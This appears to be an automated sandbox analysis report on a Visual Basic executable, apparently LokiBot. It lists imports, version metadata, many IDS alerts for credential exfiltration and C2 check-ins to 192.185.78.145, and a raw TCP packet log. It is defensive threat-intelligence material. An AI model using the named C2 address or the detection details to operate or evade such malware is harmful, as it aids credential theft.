                            MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                            Version Infos

                            Description | Data
                            Translation | 0x0404 0x04b0
                            InternalName | yappingextr
                            FileVersion | 1.06
                            CompanyName | V.Q. Benney
                            ProductName | Project5
                            ProductVersion | 1.06
                            FileDescription | V.Q. Benney
                            OriginalFilename | yappingextr.exe

                            Possible Origin

                            Language of compilation system | Country where language is spoken
                            Chinese | Taiwan

                            Network Behavior

                            Snort IDS Alerts

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            02/23/21-08:49:25.317523 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.5192.185.78.145
                            02/23/21-08:49:52.189175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.017835TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.5192.185.78.145
                            02/23/21-08:49:53.820833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.5192.185.78.145
                            02/23/21-08:49:54.628473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.5192.185.78.145
                            02/23/21-08:49:55.479698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.5192.185.78.145
                            02/23/21-08:49:56.264238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.090884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.5192.185.78.145

                            Network Port Distribution

                            TCP Packets

                            Feb 23, 2021 08:49:47.108907938 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.109077930 CET4975380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.113450050 CET4975380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.280550003 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.280649900 CET4975380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.442689896 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.496956110 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.497106075 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.497211933 CET4975380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.498301029 CET4975380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.660463095 CET8049753192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.810163975 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.971743107 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:47.971976042 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:47.991494894 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.152899981 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.152970076 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.314438105 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.352315903 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.352365971 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.352473021 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.353543997 CET4975580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.514847994 CET8049755192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.689660072 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.852161884 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:48.852349997 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:48.867384911 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.033755064 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.033982992 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.196357965 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.230602980 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.230832100 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.230921030 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.231405020 CET4975980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.393721104 CET8049759192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.532012939 CET4976180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.693535089 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.693694115 CET4976180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.698286057 CET4976180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:49.873809099 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:49.873977900 CET4976180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.035361052 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.121752977 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.121932983 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.122030020 CET4976180192.168.2.5192.185.78.145
